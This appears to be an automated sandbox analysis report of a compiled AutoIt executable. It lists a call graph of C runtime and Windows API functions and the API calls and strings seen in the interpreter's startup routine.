ac5869 100369 ac8ff6 9 API calls __controlfp_s 100350->100369 100355 ac5683 100354->100355 100358 ac5668 _memset 100354->100358 100370 ac58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100355->100370 100356 ac5673 100466 ac8d68 58 API calls __getptd_noexit 100356->100466 100358->100355 100358->100356 100361 ac56c3 100358->100361 100361->100355 100362 ac57d4 _memset 100361->100362 100371 ac4916 100361->100371 100378 ad10ab 100361->100378 100446 ad0df7 100361->100446 100468 ad0f18 58 API calls 3 library calls 100361->100468 100469 ac8d68 58 API calls __getptd_noexit 100362->100469 100367 ac5678 100467 ac8ff6 9 API calls __controlfp_s 100367->100467 100368->100350 100369->100345 100370->100345 100372 ac4935 100371->100372 100373 ac4920 100371->100373 100372->100361 100470 ac8d68 58 API calls __getptd_noexit 100373->100470 100375 ac4925 100471 ac8ff6 9 API calls __controlfp_s 100375->100471 100377 ac4930 100377->100361 100379 ad10cc 100378->100379 100380 ad10e3 100378->100380 100481 ac8d34 58 API calls __getptd_noexit 100379->100481 100382 ad181b 100380->100382 100387 ad111d 100380->100387 100497 ac8d34 58 API calls __getptd_noexit 100382->100497 100384 ad10d1 100482 ac8d68 58 API calls __getptd_noexit 100384->100482 100385 ad1820 100498 ac8d68 58 API calls __getptd_noexit 100385->100498 100389 ad1125 100387->100389 100394 ad113c 100387->100394 100483 ac8d34 58 API calls __getptd_noexit 100389->100483 100390 ad1131 100499 ac8ff6 9 API calls __controlfp_s 100390->100499 100392 ad112a 100484 ac8d68 58 API calls __getptd_noexit 100392->100484 100395 ad1151 100394->100395 100398 ad116b 100394->100398 100399 ad1189 100394->100399 100426 ad10d8 100394->100426 100485 ac8d34 58 API calls __getptd_noexit 100395->100485 100398->100395 100403 ad1176 100398->100403 100486 ac8a5d 58 API calls 2 library calls 100399->100486 100401 ad1199 100404 ad11bc 100401->100404 100405 ad11a1 100401->100405 100472 ad5ebb 100403->100472 100489 ad1b11 60 API calls 3 library calls 100404->100489 100487 ac8d68 58 API calls __getptd_noexit 100405->100487 100406 ad128a 100408 ad1303 ReadFile 100406->100408 100413 ad12a0 GetConsoleMode 100406->100413 100411 ad1325 100408->100411 100412 ad17e3 GetLastError 100408->100412 100410 ad11a6 100488 ac8d34 58 API calls __getptd_noexit 100410->100488 100411->100412 100419 ad12f5 100411->100419 100415 ad12e3 100412->100415 100416 ad17f0 100412->100416 100417 ad12b4 100413->100417 100418 ad1300 100413->100418 100430 ad12e9 100415->100430 100490 ac8d47 58 API calls 3 library calls 100415->100490 100495 ac8d68 58 API calls __getptd_noexit 100416->100495 100417->100418 100421 ad12ba ReadConsoleW 100417->100421 100418->100408 100428 ad135a 100419->100428 100429 ad15c7 100419->100429 100419->100430 100421->100419 100424 ad12dd GetLastError 100421->100424 100423 ad17f5 100496 ac8d34 58 API calls __getptd_noexit 100423->100496 100424->100415 100426->100361 100427 ac2f95 _free 58 API calls 100427->100426 100431 ad1447 100428->100431 100433 ad13c6 ReadFile 100428->100433 100429->100430 100434 ad16cd ReadFile 100429->100434 100430->100426 100430->100427 100431->100430 100436 ad1504 100431->100436 100437 ad14f4 100431->100437 100440 ad14b4 MultiByteToWideChar 100431->100440 100435 ad13e7 GetLastError 100433->100435 100443 ad13f1 100433->100443 100438 ad16f0 GetLastError 100434->100438 100445 ad16fe 100434->100445 100435->100443 100436->100440 100493 ad1b11 60 API calls 3 library calls 100436->100493 100492 ac8d68 58 API calls __getptd_noexit 100437->100492 100438->100445 100440->100424 100440->100430 100443->100428 100491 ad1b11 60 API calls 3 library calls 100443->100491 100445->100429 100494 ad1b11 60 API calls 3 library calls 100445->100494 100447 ad0e02 100446->100447 100451 ad0e17 100446->100451 100533 ac8d68 58 API calls __getptd_noexit 100447->100533 100449 ad0e07 100534 ac8ff6 9 API calls __controlfp_s 100449->100534 100452 ad0e4c 100451->100452 100457 ad0e12 100451->100457 100535 ad6234 58 API calls __malloc_crt 100451->100535 100454 ac4916 __fseek_nolock 58 API calls 100452->100454 100455 ad0e60 100454->100455 100500 ad0f97 100455->100500 100457->100361 100458 ad0e67 100458->100457 100459 ac4916 __fseek_nolock 58 API calls 100458->100459 100460 ad0e8a 100459->100460 100460->100457 100461 ac4916 __fseek_nolock 58 API calls 100460->100461 100462 ad0e96 100461->100462 100462->100457 100463 ac4916 __fseek_nolock 58 API calls 100462->100463 100464 ad0ea3 100463->100464 100465 ac4916 __fseek_nolock 58 API calls 100464->100465 100465->100457 100466->100367 100467->100355 100468->100361 100469->100367 100470->100375 100471->100377 100473 ad5ec6 100472->100473 100474 ad5ed3 100472->100474 100475 ac8d68 __controlfp_s 58 API calls 100473->100475 100477 ad5edf 100474->100477 100478 ac8d68 __controlfp_s 58 API calls 100474->100478 100476 ad5ecb 100475->100476 100476->100406 100477->100406 100479 ad5f00 100478->100479 100480 ac8ff6 __controlfp_s 9 API calls 100479->100480 100480->100476 100481->100384 100482->100426 100483->100392 100484->100390 100485->100392 100486->100401 100487->100410 100488->100426 100489->100403 100490->100430 100491->100443 100492->100430 100493->100440 100494->100445 100495->100423 100496->100430 100497->100385 100498->100390 100499->100426 100501 ad0fa3 __wsopen_helper 100500->100501 100502 ad0fc7 100501->100502 100503 ad0fb0 100501->100503 100505 ad108b 100502->100505 100508 ad0fdb 100502->100508 100504 ac8d34 __read_nolock 58 API calls 100503->100504 100507 ad0fb5 100504->100507 100506 ac8d34 __read_nolock 58 API calls 100505->100506 100509 ad0ffe 100506->100509 100510 ac8d68 __controlfp_s 58 API calls 100507->100510 100511 ad0ff9 100508->100511 100512 ad1006 100508->100512 100518 ac8d68 __controlfp_s 58 API calls 100509->100518 100522 ad0fbc __wsopen_helper 100510->100522 100513 ac8d34 __read_nolock 58 API calls 100511->100513 100514 ad1028 100512->100514 100515 ad1013 100512->100515 100513->100509 100517 acd446 ___lock_fhandle 59 API calls 100514->100517 100516 ac8d34 __read_nolock 58 API calls 100515->100516 100519 ad1018 100516->100519 100520 ad102e 100517->100520 100521 ad1020 100518->100521 100523 ac8d68 __controlfp_s 58 API calls 100519->100523 100524 ad1054 100520->100524 100525 ad1041 100520->100525 100527 ac8ff6 __controlfp_s 9 API calls 100521->100527 100522->100458 100523->100521 100528 ac8d68 __controlfp_s 58 API calls 100524->100528 100526 ad10ab __read_nolock 70 API calls 100525->100526 100530 ad104d 100526->100530 100527->100522 100529 ad1059 100528->100529 100531 ac8d34 __read_nolock 58 API calls 100529->100531 100532 ad1083 __read LeaveCriticalSection 100530->100532 100531->100530 100532->100522 100533->100449 100534->100457 100535->100452 100539 ac543a GetSystemTimeAsFileTime 100536->100539 100538 b091f8 100538->100131 100540 ac5468 __aulldiv 100539->100540 100540->100538 100542 ac5e9c __wsopen_helper 100541->100542 100543 ac5eae 100542->100543 100544 ac5ec3 100542->100544 100555 ac8d68 58 API calls __getptd_noexit 100543->100555 100545 ac6e4e __lock_file 59 API calls 100544->100545 100548 ac5ec9 100545->100548 100547 ac5eb3 100556 ac8ff6 9 API calls __controlfp_s 100547->100556 100557 ac5b00 67 API calls 6 library calls 100548->100557 100551 ac5ed4 100558 ac5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 100551->100558 100553 ac5ee6 100554 ac5ebe __wsopen_helper 100553->100554 100554->100136 100555->100547 100556->100554 100557->100551 100558->100553 100559->100016 100560->100018 100561->100068 100563 ac4a9f __wsopen_helper 100562->100563 100564 ac4abd 100563->100564 100565 ac4ad5 100563->100565 100566 ac4acd __wsopen_helper 100563->100566 100642 ac8d68 58 API calls __getptd_noexit 100564->100642 100567 ac6e4e __lock_file 59 API calls 100565->100567 100566->100079 100570 ac4adb 100567->100570 100569 ac4ac2 100576 ac55e2 __wsopen_helper 100575->100576 100577 ac560e 100576->100577 100578 ac55f6 100576->100578 100581 ac6e4e __lock_file 59 API calls 100577->100581 100584 ac5606 __wsopen_helper 100577->100584 100804 ac8d68 58 API calls __getptd_noexit 100578->100804 100583 ac5620 100581->100583 100592 b099d2 __tzset_nolock _wcscmp 100591->100592 100593 aa506b 74 API calls 100592->100593 100594 b0949a 100592->100594 100595 b09393 GetSystemTimeAsFileTime 100592->100595 100596 aa5045 85 API calls 100592->100596 100593->100592 100594->100048 100597 ac432e 58 API calls __wsplitpath_helper 100594->100597 100595->100592 100596->100592 100597->100051 100598->100059 100642->100569 100924 aa1016 100929 aa4ad2 100924->100929 100927 ac2f80 __cinit 67 API calls 100928 aa1025 100927->100928 100930 ac0ff6 Mailbox 59 API calls 100929->100930 100931 aa4ada 100930->100931 100932 aa101b 100931->100932 100936 aa4a94 100931->100936 100932->100927 100937 aa4a9d 100936->100937 100938 aa4aaf 100936->100938 100939 ac2f80 __cinit 67 API calls 100937->100939 100940 aa4afe 100938->100940 100939->100938 100941 aa77c7 59 API calls 100940->100941 100942 aa4b16 GetVersionExW 100941->100942 100943 aa7d2c 59 API calls 100942->100943 100944 aa4b59 100943->100944 100945 aa7e8c 59 API calls 100944->100945 100950 aa4b86 100944->100950 100946 aa4b7a 100945->100946 100947 aa7886 59 API calls 100946->100947 100947->100950 100948 aa4bf1 GetCurrentProcess IsWow64Process 100949 aa4c0a 100948->100949 100952 aa4c89 GetSystemInfo 100949->100952 100953 aa4c20 100949->100953 100950->100948 100951 addc8d 100950->100951 100954 aa4c56 100952->100954 100964 aa4c95 100953->100964 100954->100932 100957 aa4c7d GetSystemInfo 100959 aa4c47 100957->100959 100958 aa4c32 100960 aa4c95 2 API calls 100958->100960 100959->100954 100962 aa4c4d FreeLibrary 100959->100962 100961 aa4c3a GetNativeSystemInfo 100960->100961 100961->100959 100962->100954 100965 aa4c2e 100964->100965 100966 aa4c9e LoadLibraryA 100964->100966 100965->100957 100965->100958 100966->100965 100967 aa4caf GetProcAddress 100966->100967 100967->100965 100968 aa1066 100973 aaf8cf 100968->100973 100970 aa106c 100971 ac2f80 __cinit 67 API calls 100970->100971 100972 aa1076 100971->100972 100974 aaf8f0 100973->100974 101006 ac0143 100974->101006 100978 aaf937 100979 aa77c7 59 API calls 100978->100979 100980 aaf941 100979->100980 100981 aa77c7 59 API calls 100980->100981 100982 aaf94b 100981->100982 100983 aa77c7 59 API calls 100982->100983 100984 aaf955 100983->100984 100985 aa77c7 59 API calls 100984->100985 100986 aaf993 100985->100986 100987 aa77c7 59 API calls 100986->100987 100988 aafa5e 100987->100988 101016 ab60e7 100988->101016 100992 aafa90 100993 aa77c7 59 API calls 100992->100993 100994 aafa9a 100993->100994 101044 abffde 100994->101044 100996 aafae1 100997 aafaf1 GetStdHandle 100996->100997 100998 aafb3d 100997->100998 100999 ae49d5 100997->100999 101000 aafb45 OleInitialize 100998->101000 100999->100998 101001 ae49de 100999->101001 101000->100970 101051 b06dda 64 API calls Mailbox 101001->101051 101003 ae49e5 101052 b074a9 CreateThread 101003->101052 101005 ae49f1 CloseHandle 101005->101000 101053 ac021c 101006->101053 101009 ac021c 59 API calls 101010 ac0185 101009->101010 101011 aa77c7 59 API calls 101010->101011 101012 ac0191 101011->101012 101013 aa7d2c 59 API calls 101012->101013 101014 aaf8f6 101013->101014 101015 ac03a2 6 API calls 101014->101015 101015->100978 101017 aa77c7 59 API calls 101016->101017 101018 ab60f7 101017->101018 101019 aa77c7 59 API calls 101018->101019 101020 ab60ff 101019->101020 101060 ab5bfd 101020->101060 101023 ab5bfd 59 API calls 101024 ab610f 101023->101024 101025 aa77c7 59 API calls 101024->101025 101026 ab611a 101025->101026 101027 ac0ff6 Mailbox 59 API calls 101026->101027 101028 aafa68 101027->101028 101029 ab6259 101028->101029 101030 ab6267 101029->101030 101031 aa77c7 59 API calls 101030->101031 101032 ab6272 101031->101032 101033 aa77c7 59 API calls 101032->101033 101034 ab627d 101033->101034 101035 aa77c7 59 API calls 101034->101035 101036 ab6288 101035->101036 101037 aa77c7 59 API calls 101036->101037 101038 ab6293 101037->101038 101039 ab5bfd 59 API calls 101038->101039 101040 ab629e 101039->101040 101041 ac0ff6 Mailbox 59 API calls 101040->101041 101042 ab62a5 RegisterWindowMessageW 101041->101042 101042->100992 101045 abffee 101044->101045 101046 af5cc3 101044->101046 101048 ac0ff6 Mailbox 59 API calls 101045->101048 101063 b09d71 60 API calls 101046->101063 101050 abfff6 101048->101050 101049 af5cce 101050->100996 101051->101003 101052->101005 101064 b0748f 65 API calls 101052->101064 101054 aa77c7 59 API calls 101053->101054 101055 ac0227 101054->101055 101056 aa77c7 59 API calls 101055->101056 101057 ac022f 101056->101057 101058 aa77c7 59 API calls 101057->101058 101059 ac017b 101058->101059 101059->101009 101061 aa77c7 59 API calls 101060->101061 101062 ab5c05 101061->101062 101062->101023 101063->101049 101065 ac7e93 101066 ac7e9f __wsopen_helper 101065->101066 101102 aca048 GetStartupInfoW 101066->101102 101068 ac7ea4 101104 ac8dbc GetProcessHeap 101068->101104 101070 ac7efc 101071 ac7f07 101070->101071 101187 ac7fe3 58 API calls 3 library calls 101070->101187 101105 ac9d26 101071->101105 101074 ac7f0d 101075 ac7f18 __RTC_Initialize 101074->101075 101188 ac7fe3 58 API calls 3 library calls 101074->101188 101126 acd812 101075->101126 101078 ac7f27 101079 ac7f33 GetCommandLineW 101078->101079 101189 ac7fe3 58 API calls 3 library calls 101078->101189 101145 ad5173 GetEnvironmentStringsW 101079->101145 101082 ac7f32 101082->101079 101085 ac7f4d 101086 ac7f58 101085->101086 101190 ac32f5 58 API calls 3 library calls 101085->101190 101155 ad4fa8 101086->101155 101089 ac7f5e 101090 ac7f69 101089->101090 101191 ac32f5 58 API calls 3 library calls 101089->101191 101169 ac332f 101090->101169 101093 ac7f71 101094 ac7f7c __wwincmdln 101093->101094 101192 ac32f5 58 API calls 3 library calls 101093->101192 101175 aa492e 101094->101175 101097 ac7f90 101098 ac7f9f 101097->101098 101193 ac3598 58 API calls _doexit 101097->101193 101194 ac3320 58 API calls _doexit 101098->101194 101101 ac7fa4 __wsopen_helper 101103 aca05e 101102->101103 101103->101068 101104->101070 101195 ac33c7 36 API calls 2 library calls 101105->101195 101107 ac9d2b 101196 ac9f7c InitializeCriticalSectionAndSpinCount __getstream 101107->101196 101109 ac9d30 101110 ac9d34 101109->101110 101198 ac9fca TlsAlloc 101109->101198 101197 ac9d9c 61 API calls 2 library calls 101110->101197 101113 ac9d39 101113->101074 101114 ac9d46 101114->101110 101115 ac9d51 101114->101115 101199 ac8a15 101115->101199 101118 ac9d93 101207 ac9d9c 61 API calls 2 library calls 101118->101207 101121 ac9d98 101121->101074 101122 ac9d72 101122->101118 101123 ac9d78 101122->101123 101206 ac9c73 58 API calls 4 library calls 101123->101206 101125 ac9d80 GetCurrentThreadId 101125->101074 101127 acd81e __wsopen_helper 101126->101127 101128 ac9e4b __lock 58 API calls 101127->101128 101129 acd825 101128->101129 101130 ac8a15 __calloc_crt 58 API calls 101129->101130 101131 acd836 101130->101131 101132 acd8a1 GetStartupInfoW 101131->101132 101133 acd841 __wsopen_helper @_EH4_CallFilterFunc@8 101131->101133 101135 acd9e5 101132->101135 101137 acd8b6 101132->101137 101133->101078 101134 acdaad 101221 acdabd LeaveCriticalSection _doexit 101134->101221 101135->101134 101139 acda32 GetStdHandle 101135->101139 101140 acda45 GetFileType 101135->101140 101220 aca06b InitializeCriticalSectionAndSpinCount 101135->101220 101137->101135 101138 ac8a15 __calloc_crt 58 API calls 101137->101138 101142 acd904 101137->101142 101138->101137 101139->101135 101140->101135 101141 acd938 GetFileType 101141->101142 101142->101135 101142->101141 101219 aca06b InitializeCriticalSectionAndSpinCount 101142->101219 101146 ac7f43 101145->101146 101147 ad5184 101145->101147 101151 ad4d6b GetModuleFileNameW 101146->101151 101222 ac8a5d 58 API calls 2 library calls 101147->101222 101149 ad51aa _memmove 101150 ad51c0 FreeEnvironmentStringsW 101149->101150 101150->101146 101152 ad4d9f _wparse_cmdline 101151->101152 101154 ad4ddf _wparse_cmdline 101152->101154 101223 ac8a5d 58 API calls 2 library calls 101152->101223 101154->101085 101156 ad4fb9 101155->101156 101157 ad4fc1 __NMSG_WRITE 101155->101157 101156->101089 101158 ac8a15 __calloc_crt 58 API calls 101157->101158 101162 ad4fea __NMSG_WRITE 101158->101162 101159 ad5041 101160 ac2f95 _free 58 API calls 101159->101160 101160->101156 101161 ac8a15 __calloc_crt 58 API calls 101161->101162 101162->101156 101162->101159 101162->101161 101163 ad5066 101162->101163 101166 ad507d 101162->101166 101224 ad4857 58 API calls __controlfp_s 101162->101224 101164 ac2f95 _free 58 API calls 101163->101164 101164->101156 101225 ac9006 IsProcessorFeaturePresent 101166->101225 101168 ad5089 101168->101089 101171 ac333b __IsNonwritableInCurrentImage 101169->101171 101240 aca711 101171->101240 101172 ac3359 __initterm_e 101173 ac2f80 __cinit 67 API calls 101172->101173 101174 ac3378 __cinit __IsNonwritableInCurrentImage 101172->101174 101173->101174 101174->101093 101176 aa4948 101175->101176 101186 aa49e7 101175->101186 101177 aa4982 IsThemeActive 101176->101177 101243 ac35ac 101177->101243 101181 aa49ae 101255 aa4a5b SystemParametersInfoW SystemParametersInfoW 101181->101255 101183 aa49ba 101256 aa3b4c 101183->101256 101185 aa49c2 SystemParametersInfoW 101185->101186 101186->101097 101187->101071 101188->101075 101189->101082 101193->101098 101194->101101 101195->101107 101196->101109 101197->101113 101198->101114 101200 ac8a1c 101199->101200 101202 ac8a57 101200->101202 101204 ac8a3a 101200->101204 101208 ad5446 101200->101208 101202->101118 101205 aca026 TlsSetValue 101202->101205 101204->101200 101204->101202 101216 aca372 Sleep 101204->101216 101205->101122 101206->101125 101207->101121 101209 ad5451 101208->101209 101211 ad546c 101208->101211 101210 ad545d 101209->101210 101209->101211 101217 ac8d68 58 API calls __getptd_noexit 101210->101217 101212 ad547c HeapAlloc 101211->101212 101214 ad5462 101211->101214 101218 ac35e1 DecodePointer 101211->101218 101212->101211 101212->101214 101214->101200 101216->101204 101217->101214 101218->101211 101219->101142 101220->101135 101221->101133 101222->101149 101223->101154 101224->101162 101226 ac9011 101225->101226 101231 ac8e99 101226->101231 101230 ac902c 101230->101168 101232 ac8eb3 _memset ___raise_securityfailure 101231->101232 101233 ac8ed3 IsDebuggerPresent 101232->101233 101239 aca395 SetUnhandledExceptionFilter UnhandledExceptionFilter 101233->101239 101235 acc836 __87except 6 API calls 101237 ac8fba 101235->101237 101236 ac8f97 ___raise_securityfailure 101236->101235 101238 aca380 GetCurrentProcess TerminateProcess 101237->101238 101238->101230 101239->101236 101241 aca714 EncodePointer 101240->101241 101241->101241 101242 aca72e 101241->101242 101242->101172 101244 ac9e4b __lock 58 API calls 101243->101244 101245 ac35b7 DecodePointer EncodePointer 101244->101245 101308 ac9fb5 LeaveCriticalSection 101245->101308 101247 aa49a7 101248 ac3614 101247->101248 101249 ac361e 101248->101249 101250 ac3638 101248->101250 101249->101250 101309 ac8d68 58 API calls __getptd_noexit 101249->101309 101250->101181 101252 ac3628 101310 ac8ff6 9 API calls __controlfp_s 101252->101310 101254 ac3633 101254->101181 101255->101183 101257 aa3b59 __ftell_nolock 101256->101257 101258 aa77c7 59 API calls 101257->101258 101259 aa3b63 GetCurrentDirectoryW 101258->101259 101311 aa3778 101259->101311 101261 aa3b8c IsDebuggerPresent 101262 add4ad MessageBoxA 101261->101262 101263 aa3b9a 101261->101263 101265 add4c7 101262->101265 101263->101265 101266 aa3bb7 101263->101266 101294 aa3c73 101263->101294 101264 aa3c7a SetCurrentDirectoryW 101268 aa3c87 Mailbox 101264->101268 101510 aa7373 59 API calls Mailbox 101265->101510 101392 aa73e5 101266->101392 101268->101185 101270 add4d7 101275 add4ed SetCurrentDirectoryW 101270->101275 101275->101268 101294->101264 101308->101247 101309->101252 101310->101254 101312 aa77c7 59 API calls 101311->101312 101313 aa378e 101312->101313 101512 aa3d43 101313->101512 101315 aa37ac 101316 aa4864 61 API calls 101315->101316 101317 aa37c0 101316->101317 101318 aa7f41 59 API calls 101317->101318 101319 aa37cd 101318->101319 101320 aa4f3d 136 API calls 101319->101320 101321 aa37e6 101320->101321 101322 add3ae 101321->101322 101323 aa37ee Mailbox 101321->101323 101554 b097e5 101322->101554 101327 aa81a7 59 API calls 101323->101327 101326 add3cd 101329 ac2f95 _free 58 API calls 101326->101329 101330 aa3801 101327->101330 101328 aa4faa 84 API calls 101328->101326 101331 add3da 101329->101331 101526 aa93ea 101330->101526 101333 aa4faa 84 API calls 101331->101333 101335 add3e3 101333->101335 101339 aa3ee2 59 API calls 101335->101339 101336 aa7f41 59 API calls 101337 aa381a 101336->101337 101338 aa8620 69 API calls 101337->101338 101340 aa382c Mailbox 101338->101340 101341 add3fe 101339->101341 101342 aa7f41 59 API calls 101340->101342 101343 aa3ee2 59 API calls 101341->101343 101344 aa3852 101342->101344 101345 add41a 101343->101345 101346 aa8620 69 API calls 101344->101346 101347 aa4864 61 API calls 101345->101347 101349 aa3861 Mailbox 101346->101349 101348 add43f 101347->101348 101350 aa3ee2 59 API calls 101348->101350 101352 aa77c7 59 API calls 101349->101352 101351 add44b 101350->101351 101353 aa81a7 59 API calls 101351->101353 101354 aa387f 101352->101354 101355 add459 101353->101355 101529 aa3ee2 101354->101529 101357 aa3ee2 59 API calls 101355->101357 101359 add468 101357->101359 101365 aa81a7 59 API calls 101359->101365 101361 aa3899 101361->101335 101362 aa38a3 101361->101362 101363 ac313d _W_store_winword 60 API calls 101362->101363 101364 aa38ae 101363->101364 101364->101341 101366 aa38b8 101364->101366 101367 add48a 101365->101367 101368 ac313d _W_store_winword 60 API calls 101366->101368 101369 aa3ee2 59 API calls 101367->101369 101370 aa38c3 101368->101370 101371 add497 101369->101371 101370->101345 101372 aa38cd 101370->101372 101371->101371 101373 ac313d _W_store_winword 60 API calls 101372->101373 101374 aa38d8 101373->101374 101374->101359 101375 aa3919 101374->101375 101377 aa3ee2 59 API calls 101374->101377 101375->101359 101376 aa3926 101375->101376 101378 aa942e 59 API calls 101376->101378 101379 aa38fc 101377->101379 101380 aa3936 101378->101380 101381 aa81a7 59 API calls 101379->101381 101382 aa91b0 59 API calls 101380->101382 101383 aa390a 101381->101383 101384 aa3944 101382->101384 101385 aa3ee2 59 API calls 101383->101385 101545 aa9040 101384->101545 101385->101375 101387 aa93ea 59 API calls 101389 aa3961 101387->101389 101388 aa9040 60 API calls 101388->101389 101389->101387 101389->101388 101390 aa3ee2 59 API calls 101389->101390 101391 aa39a7 Mailbox 101389->101391 101390->101389 101391->101261 101393 aa73f2 __ftell_nolock 101392->101393 101394 aa740b 101393->101394 101396 adee4b _memset 101393->101396 101395 aa48ae 60 API calls 101394->101395 101397 aa7414 101395->101397 101398 adee67 GetOpenFileNameW 101396->101398 101594 ac09d5 101397->101594 101400 adeeb6 101398->101400 101402 aa7d2c 59 API calls 101400->101402 101404 adeecb 101402->101404 101404->101404 101510->101270 101513 aa3d50 __ftell_nolock 101512->101513 101514 aa7d2c 59 API calls 101513->101514 101519 aa3eb6 Mailbox 101513->101519 101516 aa3d82 101514->101516 101515 aa7b52 59 API calls 101515->101516 101516->101515 101525 aa3db8 Mailbox 101516->101525 101517 aa7b52 59 API calls 101517->101525 101518 aa3e89 101518->101519 101520 aa7f41 59 API calls 101518->101520 101519->101315 101522 aa3eaa 101520->101522 101521 aa7f41 59 API calls 101521->101525 101523 aa3f84 59 API calls 101522->101523 101523->101519 101524 aa3f84 59 API calls 101524->101525 101525->101517 101525->101518 101525->101519 101525->101521 101525->101524 101527 ac0ff6 Mailbox 59 API calls 101526->101527 101528 aa380d 101527->101528 101528->101336 101530 aa3eec 101529->101530 101531 aa3f05 101529->101531 101532 aa81a7 59 API calls 101530->101532 101533 aa7d2c 59 API calls 101531->101533 101534 aa388b 101532->101534 101533->101534 101535 ac313d 101534->101535 101536 ac31be 101535->101536 101537 ac3149 101535->101537 101591 ac31d0 60 API calls 3 library calls 101536->101591 101544 ac316e 101537->101544 101589 ac8d68 58 API calls __getptd_noexit 101537->101589 101539 ac31cb 101539->101361 101541 ac3155 101590 ac8ff6 9 API calls __controlfp_s 101541->101590 101543 ac3160 101543->101361 101544->101361 101546 adf5a5 101545->101546 101549 aa9057 101545->101549 101546->101549 101593 aa8d3b 59 API calls Mailbox 101546->101593 101548 aa915f 101548->101389 101549->101548 101550 aa9158 101549->101550 101551 aa91a0 101549->101551 101552 ac0ff6 Mailbox 59 API calls 101550->101552 101592 aa9e9c 60 API calls Mailbox 101551->101592 101552->101548 101555 aa5045 85 API calls 101554->101555 101556 b09854 101555->101556 101557 b099be 96 API calls 101556->101557 101558 b09866 101557->101558 101559 aa506b 74 API calls 101558->101559 101588 add3c1 101558->101588 101560 b09881 101559->101560 101561 aa506b 74 API calls 101560->101561 101562 b09891 101561->101562 101563 aa506b 74 API calls 101562->101563 101564 b098ac 101563->101564 101565 aa506b 74 API calls 101564->101565 101566 b098c7 101565->101566 101567 aa5045 85 API calls 101566->101567 101568 b098de 101567->101568 101569 ac594c std::exception::_Copy_str 58 API calls 101568->101569 101570 b098e5 101569->101570 101571 ac594c std::exception::_Copy_str 58 API calls 101570->101571 101572 b098ef 101571->101572 101573 aa506b 74 API calls 101572->101573 101574 b09903 101573->101574 101575 b09393 GetSystemTimeAsFileTime 101574->101575 101576 b09916 101575->101576 101577 b09940 101576->101577 101578 b0992b 101576->101578 101580 b099a5 101577->101580 101581 b09946 101577->101581 101579 ac2f95 _free 58 API calls 101578->101579 101583 b09931 101579->101583 101582 ac2f95 _free 58 API calls 101580->101582 101584 b08d90 116 API calls 101581->101584 101582->101588 101585 ac2f95 _free 58 API calls 101583->101585 101586 b0999d 101584->101586 101585->101588 101587 ac2f95 _free 58 API calls 101586->101587 101587->101588 101588->101326 101588->101328 101589->101541 101590->101543 101591->101539 101592->101548 101593->101549 101595 ad1b90 __ftell_nolock 101594->101595 101596 ac09e2 GetLongPathNameW 101595->101596 101597 aa7d2c 59 API calls 101596->101597 101877 aa1055 101882 aa2649 101877->101882 101880 ac2f80 __cinit 67 API calls 101881 aa1064 101880->101881 101883 aa77c7 59 API calls 101882->101883 101884 aa26b7 101883->101884 101889 aa3582 101884->101889 101887 aa2754 101888 aa105a 101887->101888 101892 aa3416 59 API calls 2 library calls 101887->101892 101888->101880 101893 aa35b0 101889->101893 101892->101887 101894 aa35a1 101893->101894 101895 aa35bd 101893->101895 101894->101887 101895->101894 101896 aa35c4 RegOpenKeyExW 101895->101896 101896->101894 101897 aa35de RegQueryValueExW 101896->101897 101898 aa35ff 101897->101898 101899 aa3614 RegCloseKey 101897->101899 101898->101899 101899->101894

                                Control-flow Graph

                                APIs
                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B7A
                                • IsDebuggerPresent.KERNEL32 ref: 00AA3B8C
                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B662F8,00B662E0,?,?), ref: 00AA3BFD
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                  • Part of subcall function 00AB0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3C26,00B662F8,?,?,?), ref: 00AB0ACE
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C81
                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B593F0,00000010), ref: 00ADD4BC
                                • SetCurrentDirectoryW.KERNEL32(?,00B662F8,?,?,?), ref: 00ADD4F4
                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B55D40,00B662F8,?,?,?), ref: 00ADD57A
                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 00ADD581
                                  • Part of subcall function 00AA3A58: GetSysColorBrush.USER32(0000000F), ref: 00AA3A62
                                  • Part of subcall function 00AA3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A71
                                  • Part of subcall function 00AA3A58: LoadIconW.USER32(00000063), ref: 00AA3A88
                                  • Part of subcall function 00AA3A58: LoadIconW.USER32(000000A4), ref: 00AA3A9A
                                  • Part of subcall function 00AA3A58: LoadIconW.USER32(000000A2), ref: 00AA3AAC
                                  • Part of subcall function 00AA3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AD2
                                  • Part of subcall function 00AA3A58: RegisterClassExW.USER32(?), ref: 00AA3B28
                                  • Part of subcall function 00AA39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A15
                                  • Part of subcall function 00AA39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A36
                                  • Part of subcall function 00AA39E7: ShowWindow.USER32(00000000,?,?), ref: 00AA3A4A
                                  • Part of subcall function 00AA39E7: ShowWindow.USER32(00000000,?,?), ref: 00AA3A53
                                  • Part of subcall function 00AA43DB: _memset.LIBCMT ref: 00AA4401
                                  • Part of subcall function 00AA43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA44A6
                                Strings
                                • runas, xrefs: 00ADD575
                                • This is a third-party compiled AutoIt script., xrefs: 00ADD4B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
